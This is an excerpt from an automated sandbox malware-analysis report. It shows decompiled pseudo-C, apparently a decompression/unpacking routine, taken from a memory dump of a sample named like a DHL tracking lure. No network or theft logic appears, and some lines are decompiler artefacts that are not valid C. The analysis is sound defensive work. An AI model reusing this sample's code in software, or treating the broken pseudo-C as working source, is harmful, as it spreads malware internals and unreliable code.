                    											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                    											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                    											 *( *(__ebp - 0x68)) = __al;
                    											__ecx =  *(__ebp - 0x14);
                    											 *(__ecx +  *(__ebp - 8)) = __al;
                    											__eax = __ecx + 1;
                    											__edx = 0;
                    											_t192 = __eax %  *(__ebp - 0x74);
                    											__eax = __eax /  *(__ebp - 0x74);
                    											__edx = _t192;
                    											goto L80;
                    										case 0x1b:
                    											L76:
                    											__eflags =  *(__ebp - 0x64);
                    											if( *(__ebp - 0x64) == 0) {
                    												 *(__ebp - 0x88) = 0x1b;
                    												goto L170;
                    											}
                    											__eax =  *(__ebp - 0x14);
                    											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                    											__eflags = __eax -  *(__ebp - 0x74);
                    											if(__eax >=  *(__ebp - 0x74)) {
                    												__eax = __eax +  *(__ebp - 0x74);
                    												__eflags = __eax;
                    											}
                    											__edx =  *(__ebp - 8);
                    											__cl =  *(__eax + __edx);
                    											__eax =  *(__ebp - 0x14);
                    											 *(__ebp - 0x5c) = __cl;
                    											 *(__eax + __edx) = __cl;
                    											__eax = __eax + 1;
                    											__edx = 0;
                    											_t275 = __eax %  *(__ebp - 0x74);
                    											__eax = __eax /  *(__ebp - 0x74);
                    											__edx = _t275;
                    											__eax =  *(__ebp - 0x68);
                    											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                    											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                    											_t284 = __ebp - 0x64;
                    											 *_t284 =  *(__ebp - 0x64) - 1;
                    											__eflags =  *_t284;
                    											 *( *(__ebp - 0x68)) = __cl;
                    											L80:
                    											 *(__ebp - 0x14) = __edx;
                    											goto L81;
                    										case 0x1c:
                    											while(1) {
                    												L124:
                    												__eflags =  *(__ebp - 0x64);
                    												if( *(__ebp - 0x64) == 0) {
                    													break;
                    												}
                    												__eax =  *(__ebp - 0x14);
                    												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                    												__eflags = __eax -  *(__ebp - 0x74);
                    												if(__eax >=  *(__ebp - 0x74)) {
                    													__eax = __eax +  *(__ebp - 0x74);
                    													__eflags = __eax;
                    												}
                    												__edx =  *(__ebp - 8);
                    												__cl =  *(__eax + __edx);
                    												__eax =  *(__ebp - 0x14);
                    												 *(__ebp - 0x5c) = __cl;
                    												 *(__eax + __edx) = __cl;
                    												__eax = __eax + 1;
                    												__edx = 0;
                    												_t415 = __eax %  *(__ebp - 0x74);
                    												__eax = __eax /  *(__ebp - 0x74);
                    												__edx = _t415;
                    												__eax =  *(__ebp - 0x68);
                    												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                    												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                    												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                    												__eflags =  *(__ebp - 0x30);
                    												 *( *(__ebp - 0x68)) = __cl;
                    												 *(__ebp - 0x14) = _t415;
                    												if( *(__ebp - 0x30) > 0) {
                    													continue;
                    												} else {
                    													L81:
                    													 *(__ebp - 0x88) = 2;
                    													goto L1;
                    												}
                    											}
                    											 *(__ebp - 0x88) = 0x1c;
                    											L170:
                    											_push(0x22);
                    											_pop(_t567);
                    											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
                    											_t535 = 0;
                    											L172:
                    											return _t535;
                    									}
                    								}
                    								L171:
                    								_t535 = _t534 | 0xffffffff;
                    								goto L172;
                    							}
                    						}
                    						__eax =  *(__ebp - 0x50);
                    						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                    						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                    						__eax =  *(__ebp - 0x58);
                    						__esi = __edx + __eax;
                    						 *(__ebp - 0x54) = __esi;
                    						__ax =  *__esi;
                    						__edi = __ax & 0x0000ffff;
                    						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                    						if( *(__ebp - 0xc) >= __ecx) {
                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                    							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                    							__cx = __ax;
                    							__cx = __ax >> 5;
                    							__eax = __eax - __ecx;
                    							__edx = __edx + 1;
                    							 *__esi = __ax;
                    							 *(__ebp - 0x50) = __edx;
                    						} else {
                    							 *(__ebp - 0x10) = __ecx;
                    							0x800 = 0x800 - __edi;
                    							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                    							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                    							 *__esi = __cx;
                    						}
                    						if( *(__ebp - 0x10) >= 0x1000000) {
                    							goto L148;
                    						} else {
                    							goto L146;
                    						}
                    					}
                    					goto L1;
                    				}
                    			}









                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 62cf5b17206a6db47431eecf79a6a82934569840bddaea447bb47edb6382e710
                    • Instruction ID: bb8ed6064adbc6ac752208bd1780db284a58169b415d1e5229999a4f541ad509
                    • Opcode Fuzzy Hash: 62cf5b17206a6db47431eecf79a6a82934569840bddaea447bb47edb6382e710
                    • Instruction Fuzzy Hash: 11912271D00229CBDF28CF98C854BADBBB1FB44305F15816AD816BB291C7789A96DF44
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 98%
                    			E00406398() {
                    				unsigned short _t532;
                    				signed int _t533;
                    				void _t534;
                    				void* _t535;
                    				signed int _t536;
                    				signed int _t565;
                    				signed int _t568;
                    				signed int _t589;
                    				signed int* _t606;
                    				void* _t613;
                    
                    				L0:
                    				while(1) {
                    					L0:
                    					if( *(_t613 - 0x40) != 0) {
                    						L89:
                    						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
                    						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
                    						L69:
                    						_t606 =  *(_t613 - 0x58);
                    						 *(_t613 - 0x84) = 0x12;
                    						L132:
                    						 *(_t613 - 0x54) = _t606;
                    						L133:
                    						_t532 =  *_t606;
                    						_t589 = _t532 & 0x0000ffff;
                    						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                    						if( *(_t613 - 0xc) >= _t565) {
                    							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                    							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                    							 *(_t613 - 0x40) = 1;
                    							_t533 = _t532 - (_t532 >> 5);
                    							 *_t606 = _t533;
                    						} else {
                    							 *(_t613 - 0x10) = _t565;
                    							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                    							 *_t606 = (0x800 - _t589 >> 5) + _t532;
                    						}
                    						if( *(_t613 - 0x10) >= 0x1000000) {
                    							L139:
                    							_t534 =  *(_t613 - 0x84);
                    							L140:
                    							 *(_t613 - 0x88) = _t534;
                    							goto L1;
                    						} else {
                    							L137:
                    							if( *(_t613 - 0x6c) == 0) {
                    								 *(_t613 - 0x88) = 5;
                    								goto L170;
                    							}
                    							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                    							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                    							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                    							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                    							goto L139;
                    						}
                    					} else {
                    						if( *(__ebp - 0x60) == 0) {
                    							L171:
                    							_t536 = _t535 | 0xffffffff;
                    							L172:
                    							return _t536;
                    						}
                    						__eax = 0;
                    						_t258 =  *(__ebp - 0x38) - 7 >= 0;
                    						0 | _t258 = _t258 + _t258 + 9;
                    						 *(__ebp - 0x38) = _t258 + _t258 + 9;
                    						L75:
                    						if( *(__ebp - 0x64) == 0) {
                    							 *(__ebp - 0x88) = 0x1b;
                    							L170:
                    							_t568 = 0x22;
                    							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                    							_t536 = 0;
                    							goto L172;
                    						}
                    						__eax =  *(__ebp - 0x14);
                    						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                    						if(__eax >=  *(__ebp - 0x74)) {
                    							__eax = __eax +  *(__ebp - 0x74);
                    						}
                    						__edx =  *(__ebp - 8);
                    						__cl =  *(__eax + __edx);
                    						__eax =  *(__ebp - 0x14);
                    						 *(__ebp - 0x5c) = __cl;
                    						 *(__eax + __edx) = __cl;
                    						__eax = __eax + 1;
                    						__edx = 0;
                    						_t274 = __eax %  *(__ebp - 0x74);
                    						__eax = __eax /  *(__ebp - 0x74);
                    						__edx = _t274;
                    						__eax =  *(__ebp - 0x68);
                    						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                    						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                    						_t283 = __ebp - 0x64;
                    						 *_t283 =  *(__ebp - 0x64) - 1;
                    						 *( *(__ebp - 0x68)) = __cl;
                    						L79:
                    						 *(__ebp - 0x14) = __edx;
                    						L80:
                    						 *(__ebp - 0x88) = 2;
                    					}
                    					L1:
                    					_t535 =  *(_t613 - 0x88);
                    					if(_t535 > 0x1c) {
                    						goto L171;
                    					}
                    					switch( *((intOrPtr*)(_t535 * 4 +  &M004068EF))) {
                    						case 0:
                    							if( *(_t613 - 0x6c) == 0) {
                    								goto L170;
                    							}
                    							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                    							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                    							_t535 =  *( *(_t613 - 0x70));
                    							if(_t535 > 0xe1) {
                    								goto L171;
                    							}
                    							_t539 = _t535 & 0x000000ff;
                    							_push(0x2d);
                    							asm("cdq");
                    							_pop(_t570);
                    							_push(9);
                    							_pop(_t571);
                    							_t609 = _t539 / _t570;
                    							_t541 = _t539 % _t570 & 0x000000ff;
                    							asm("cdq");
                    							_t604 = _t541 % _t571 & 0x000000ff;
                    							 *(_t613 - 0x3c) = _t604;
                    							 *(_t613 - 0x1c) = (1 << _t609) - 1;
                    							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
                    							_t612 = (0x300 << _t604 + _t609) + 0x736;
                    							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                    								L10:
                    								if(_t612 == 0) {
                    									L12:
                    									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                    									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                    									goto L15;
                    								} else {
                    									goto L11;
                    								}
                    								do {
                    									L11:
                    									_t612 = _t612 - 1;
                    									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                    								} while (_t612 != 0);
                    								goto L12;
                    							}
                    							if( *(_t613 - 4) != 0) {
                    								GlobalFree( *(_t613 - 4));
                    							}
                    							_t535 = GlobalAlloc(0x40, 0x600); // executed
                    							 *(_t613 - 4) = _t535;
                    							if(_t535 == 0) {
                    								goto L171;
                    							} else {
                    								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                    								goto L10;
                    							}
                    						case 1:
                    							L13:
                    							__eflags =  *(_t613 - 0x6c);
                    							if( *(_t613 - 0x6c) == 0) {
                    								 *(_t613 - 0x88) = 1;
                    								goto L170;
                    							}
                    							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                    							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                    							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                    							_t45 = _t613 - 0x48;
                    							 *_t45 =  *(_t613 - 0x48) + 1;
                    							__eflags =  *_t45;
                    							L15:
                    							if( *(_t613 - 0x48) < 4) {
                    								goto L13;
                    							}
                    							_t547 =  *(_t613 - 0x40);
                    							if(_t547 ==  *(_t613 - 0x74)) {
                    								L20:
                    								 *(_t613 - 0x48) = 5;
                    								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                    								goto L23;
                    							}
                    							 *(_t613 - 0x74) = _t547;
                    							if( *(_t613 - 8) != 0) {
                    								GlobalFree( *(_t613 - 8));
                    							}
                    							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                    							 *(_t613 - 8) = _t535;
                    							if(_t535 == 0) {
                    								goto L171;
                    							} else {
                    								goto L20;
                    							}
                    						case 2:
                    							L24:
                    							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                    							 *(_t613 - 0x84) = 6;
                    							 *(_t613 - 0x4c) = _t554;
                    							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
                    							goto L132;
                    						case 3:
                    							L21:
                    							__eflags =  *(_t613 - 0x6c);
                    							if( *(_t613 - 0x6c) == 0) {
                    								 *(_t613 - 0x88) = 3;
                    								goto L170;
                    							}
                    							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                    							_t67 = _t613 - 0x70;
                    							 *_t67 =  &(( *(_t613 - 0x70))[1]);
                    							__eflags =  *_t67;
                    							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                    							L23:
                    							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                    							if( *(_t613 - 0x48) != 0) {
                    								goto L21;
                    							}
                    							goto L24;
                    						case 4:
                    							goto L133;
                    						case 5:
                    							goto L137;
                    						case 6:
                    							__edx = 0;
                    							__eflags =  *(__ebp - 0x40);
                    							if( *(__ebp - 0x40) != 0) {
                    								__eax =  *(__ebp - 4);
                    								__ecx =  *(__ebp - 0x38);
                    								 *(__ebp - 0x34) = 1;
                    								 *(__ebp - 0x84) = 7;
                    								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                    								goto L132;
                    							}
                    							__eax =  *(__ebp - 0x5c) & 0x000000ff;
                    							__esi =  *(__ebp - 0x60);
                    							__cl = 8;
                    							__cl = 8 -  *(__ebp - 0x3c);
                    							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                    							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                    							__ecx =  *(__ebp - 0x3c);
                    							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                    							__ecx =  *(__ebp - 4);
                    							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                    							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                    							__eflags =  *(__ebp - 0x38) - 4;
                    							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                    							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                    							if( *(__ebp - 0x38) >= 4) {
                    								__eflags =  *(__ebp - 0x38) - 0xa;
                    								if( *(__ebp - 0x38) >= 0xa) {
                    									_t98 = __ebp - 0x38;
                    									 *_t98 =  *(__ebp - 0x38) - 6;
                    									__eflags =  *_t98;
                    								} else {
                    									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                    								}
                    							} else {
                    								 *(__ebp - 0x38) = 0;
                    							}
                    							__eflags =  *(__ebp - 0x34) - __edx;
                    							if( *(__ebp - 0x34) == __edx) {
                    								__ebx = 0;
                    								__ebx = 1;
                    								goto L61;
                    							} else {
                    								__eax =  *(__ebp - 0x14);
                    								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                    								__eflags = __eax -  *(__ebp - 0x74);
                    								if(__eax >=  *(__ebp - 0x74)) {
                    									__eax = __eax +  *(__ebp - 0x74);
                    									__eflags = __eax;
                    								}
                    								__ecx =  *(__ebp - 8);
                    								__ebx = 0;
                    								__ebx = 1;
                    								__al =  *((intOrPtr*)(__eax + __ecx));
                    								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                    								goto L41;
                    							}
                    						case 7:
                    							__eflags =  *(__ebp - 0x40) - 1;
                    							if( *(__ebp - 0x40) != 1) {
                    								__eax =  *(__ebp - 0x24);
                    								 *(__ebp - 0x80) = 0x16;
                    								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                    								__eax =  *(__ebp - 0x28);
                    								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                    								__eax =  *(__ebp - 0x2c);
                    								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                    								__eax = 0;
                    								__eflags =  *(__ebp - 0x38) - 7;
                    								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                    								__al = __al & 0x000000fd;
                    								__eax = (__eflags >= 0) - 1 + 0xa;
                    								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                    								__eax =  *(__ebp - 4);
                    								__eax =  *(__ebp - 4) + 0x664;
                    								__eflags = __eax;
                    								 *(__ebp - 0x58) = __eax;
                    								goto L69;
                    							}
                    							__eax =  *(__ebp - 4);
                    							__ecx =  *(__ebp - 0x38);
                    							 *(__ebp - 0x84) = 8;
                    							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                    							goto L132;
                    						case 8:
                    							__eflags =  *(__ebp - 0x40);
                    							if( *(__ebp - 0x40) != 0) {
                    								__eax =  *(__ebp - 4);
                    								__ecx =  *(__ebp - 0x38);
                    								 *(__ebp - 0x84) = 0xa;
                    								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                    							} else {
                    								__eax =  *(__ebp - 0x38);
                    								__ecx =  *(__ebp - 4);
                    								__eax =  *(__ebp - 0x38) + 0xf;
                    								 *(__ebp - 0x84) = 9;
                    								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                    								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                    							}
                    							goto L132;
                    						case 9:
                    							goto L0;
                    						case 0xa:
                    							__eflags =  *(__ebp - 0x40);
                    							if( *(__ebp - 0x40) != 0) {
                    								__eax =  *(__ebp - 4);
                    								__ecx =  *(__ebp - 0x38);
                    								 *(__ebp - 0x84) = 0xb;
                    								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                    								goto L132;
                    							}
                    							__eax =  *(__ebp - 0x28);
                    							goto L88;
                    						case 0xb:
                    							__eflags =  *(__ebp - 0x40);
                    							if( *(__ebp - 0x40) != 0) {
                    								__ecx =  *(__ebp - 0x24);
                    								__eax =  *(__ebp - 0x20);
                    								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                    							} else {
                    								__eax =  *(__ebp - 0x24);
                    							}
                    							__ecx =  *(__ebp - 0x28);
                    							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                    							L88:
                    							__ecx =  *(__ebp - 0x2c);
                    							 *(__ebp - 0x2c) = __eax;
                    							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                    							goto L89;
                    						case 0xc:
                    							L99:
                    							__eflags =  *(__ebp - 0x6c);
                    							if( *(__ebp - 0x6c) == 0) {
                    								 *(__ebp - 0x88) = 0xc;
                    								goto L170;
                    							}
                    							__ecx =  *(__ebp - 0x70);
                    							__eax =  *(__ebp - 0xc);
                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    							_t334 = __ebp - 0x70;
                    							 *_t334 =  *(__ebp - 0x70) + 1;
                    							__eflags =  *_t334;
                    							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    							__eax =  *(__ebp - 0x2c);
                    							goto L101;
                    						case 0xd:
                    							L37:
                    							__eflags =  *(__ebp - 0x6c);
                    							if( *(__ebp - 0x6c) == 0) {
                    								 *(__ebp - 0x88) = 0xd;
                    								goto L170;
                    							}
                    							__ecx =  *(__ebp - 0x70);
                    							__eax =  *(__ebp - 0xc);
                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    							_t122 = __ebp - 0x70;
                    							 *_t122 =  *(__ebp - 0x70) + 1;
                    							__eflags =  *_t122;
                    							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    							L39:
                    							__eax =  *(__ebp - 0x40);
                    							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                    							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                    								goto L48;
                    							}
                    							__eflags = __ebx - 0x100;
                    							if(__ebx >= 0x100) {
                    								goto L54;
                    							}
                    							L41:
                    							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                    							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                    							__ecx =  *(__ebp - 0x58);
                    							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                    							 *(__ebp - 0x48) = __eax;
                    							__eax = __eax + 1;
                    							__eax = __eax << 8;
                    							__eax = __eax + __ebx;
                    							__esi =  *(__ebp - 0x58) + __eax * 2;
                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                    							__ax =  *__esi;
                    							 *(__ebp - 0x54) = __esi;
                    							__edx = __ax & 0x0000ffff;
                    							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                    							__eflags =  *(__ebp - 0xc) - __ecx;
                    							if( *(__ebp - 0xc) >= __ecx) {
                    								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                    								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                    								__cx = __ax;
                    								 *(__ebp - 0x40) = 1;
                    								__cx = __ax >> 5;
                    								__eflags = __eax;
                    								__ebx = __ebx + __ebx + 1;
                    								 *__esi = __ax;
                    							} else {
                    								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                    								 *(__ebp - 0x10) = __ecx;
                    								0x800 = 0x800 - __edx;
                    								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                    								__ebx = __ebx + __ebx;
                    								 *__esi = __cx;
                    							}
                    							__eflags =  *(__ebp - 0x10) - 0x1000000;
                    							 *(__ebp - 0x44) = __ebx;
                    							if( *(__ebp - 0x10) >= 0x1000000) {
                    								goto L39;
                    							} else {
                    								goto L37;
                    							}
                    						case 0xe:
                    							L46:
                    							__eflags =  *(__ebp - 0x6c);
                    							if( *(__ebp - 0x6c) == 0) {
                    								 *(__ebp - 0x88) = 0xe;
                    								goto L170;
                    							}
                    							__ecx =  *(__ebp - 0x70);
                    							__eax =  *(__ebp - 0xc);
                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    							_t156 = __ebp - 0x70;
                    							 *_t156 =  *(__ebp - 0x70) + 1;
                    							__eflags =  *_t156;
                    							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    							while(1) {
                    								L48:
                    								__eflags = __ebx - 0x100;
                    								if(__ebx >= 0x100) {
                    									break;
                    								}
                    								__eax =  *(__ebp - 0x58);
                    								__edx = __ebx + __ebx;
                    								__ecx =  *(__ebp - 0x10);
                    								__esi = __edx + __eax;
                    								__ecx =  *(__ebp - 0x10) >> 0xb;
                    								__ax =  *__esi;
                    								 *(__ebp - 0x54) = __esi;
                    								__edi = __ax & 0x0000ffff;
                    								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                    								__eflags =  *(__ebp - 0xc) - __ecx;
                    								if( *(__ebp - 0xc) >= __ecx) {
                    									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                    									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                    									__cx = __ax;
                    									_t170 = __edx + 1; // 0x1
                    									__ebx = _t170;
                    									__cx = __ax >> 5;
                    									__eflags = __eax;
                    									 *__esi = __ax;
                    								} else {
                    									 *(__ebp - 0x10) = __ecx;
                    									0x800 = 0x800 - __edi;
                    									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                    									__ebx = __ebx + __ebx;
                    									 *__esi = __cx;
                    								}
                    								__eflags =  *(__ebp - 0x10) - 0x1000000;
                    								 *(__ebp - 0x44) = __ebx;
                    								if( *(__ebp - 0x10) >= 0x1000000) {
                    									continue;
                    								} else {
                    									goto L46;
                    								}
                    							}
                    							L54:
                    							_t173 = __ebp - 0x34;
                    							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                    							__eflags =  *_t173;
                    							goto L55;
                    						case 0xf:
                    							L58:
                    							__eflags =  *(__ebp - 0x6c);
                    							if( *(__ebp - 0x6c) == 0) {
                    								 *(__ebp - 0x88) = 0xf;
                    								goto L170;
                    							}
                    							__ecx =  *(__ebp - 0x70);
                    							__eax =  *(__ebp - 0xc);
                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    							_t203 = __ebp - 0x70;
                    							 *_t203 =  *(__ebp - 0x70) + 1;
                    							__eflags =  *_t203;
                    							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    							L60:
                    							__eflags = __ebx - 0x100;
                    							if(__ebx >= 0x100) {
                    								L55:
                    								__al =  *(__ebp - 0x44);
                    								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                    								goto L56;
                    							}
                    							L61:
                    							__eax =  *(__ebp - 0x58);
                    							__edx = __ebx + __ebx;
                    							__ecx =  *(__ebp - 0x10);
                    							__esi = __edx + __eax;
                    							__ecx =  *(__ebp - 0x10) >> 0xb;
                    							__ax =  *__esi;
                    							 *(__ebp - 0x54) = __esi;
                    							__edi = __ax & 0x0000ffff;
                    							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                    							__eflags =  *(__ebp - 0xc) - __ecx;
                    							if( *(__ebp - 0xc) >= __ecx) {
                    								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                    								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                    								__cx = __ax;
                    								_t217 = __edx + 1; // 0x1
                    								__ebx = _t217;
                    								__cx = __ax >> 5;
                    								__eflags = __eax;
                    								 *__esi = __ax;
                    							} else {
                    								 *(__ebp - 0x10) = __ecx;
                    								0x800 = 0x800 - __edi;
                    								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                    								__ebx = __ebx + __ebx;
                    								 *__esi = __cx;
                    							}
                    							__eflags =  *(__ebp - 0x10) - 0x1000000;
                    							 *(__ebp - 0x44) = __ebx;
                    							if( *(__ebp - 0x10) >= 0x1000000) {
                    								goto L60;
                    							} else {
                    								goto L58;
                    							}
                    						case 0x10:
                    							L109:
